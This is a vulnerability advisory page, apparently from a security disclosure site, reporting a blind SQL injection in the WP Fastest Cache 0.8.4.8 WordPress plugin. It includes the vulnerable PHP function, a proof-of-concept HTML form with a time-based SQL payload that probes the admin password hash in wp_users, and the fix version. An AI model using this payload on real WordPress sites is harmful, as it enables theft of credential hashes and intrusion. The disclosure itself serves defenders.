WP Fastest Cache 0.8.4.8 Blind SQL Injection

2015.11.12
Credit: Kacper Szurek
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: WP Fastest Cache 0.8.4.8 Blind SQL Injection # Date: 11-11-2015 # Software Link: https://wordpress.org/plugins/wp-fastest-cache/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description For this vulnerabilities also WP-Polls needs to be installed. Everyone can access wpfc_wppolls_ajax_request(). $_POST["poll_id"] is not escaped properly. File: wp-fastest-cache\inc\wp-polls.php public function wpfc_wppolls_ajax_request() { $id = strip_tags($_POST["poll_id"]); $id = mysql_real_escape_string($id); $result = check_voted($id); if($result){ echo "true"; }else{ echo "false"; } die(); } http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html 2. Proof of Concept <form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request"> <input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- "> <input type="submit" value="Send"> </form> 3. Solution: Update to version 0.8.4.9

References:

http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top